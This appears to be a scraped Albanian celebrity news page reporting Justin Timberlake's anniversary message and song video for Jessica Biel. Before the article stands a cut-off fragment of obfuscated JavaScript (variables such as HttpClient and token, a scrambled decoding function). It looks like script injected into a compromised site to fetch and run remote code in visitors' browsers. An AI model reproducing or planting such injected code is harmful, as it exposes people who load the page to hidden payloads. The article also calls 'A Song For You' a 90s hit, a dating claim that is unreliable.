;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Vajzat vdisnin pas tij, por ai i dashuruar marrëzisht pas bashkëshortes: Urim romantik për përvjetor (FOTO)

By

Ai e ka një rreze dielli në xhepin e tij! Këngëtari i famshëm, Justin Timberlake, i ka shkruar një letër të adhurueshme gruas së tij, aktores Jessica Biel, në nder të përvjetorit të pestë të martesës së tyre.

Me datë 19 tetor, ata kanë bërë plot pesë vjet që kur u martuan dhe është një datë e rëndësishme për këngëtarin që ka thyer me miliona zemra vajzash.

36 vjeçari Timberlake, e ka publikuar një video në profilin e tij në Instagram, ku shihet duke kënduar në një studio këngën e vallëzimit të tyre të parë në dasmë.

Bëhet fjalë për këngën e Leon Russell, “A Song For You” –  një hit i viteve të 90-ta.

“Sot është një ditë e veçantë për mua, ngase pesë vjet më parë, në këtë ditë, u bëra njeriu më i lumtur në botë, kur bëra betimet e martesës para shoqes sime më të mirë. Kjo këngë ishte e vallëzimit tonë të parë”, ka shkruar ai, transmeton Prive. /Prive.al

 

 

Artikuj të ngjashëm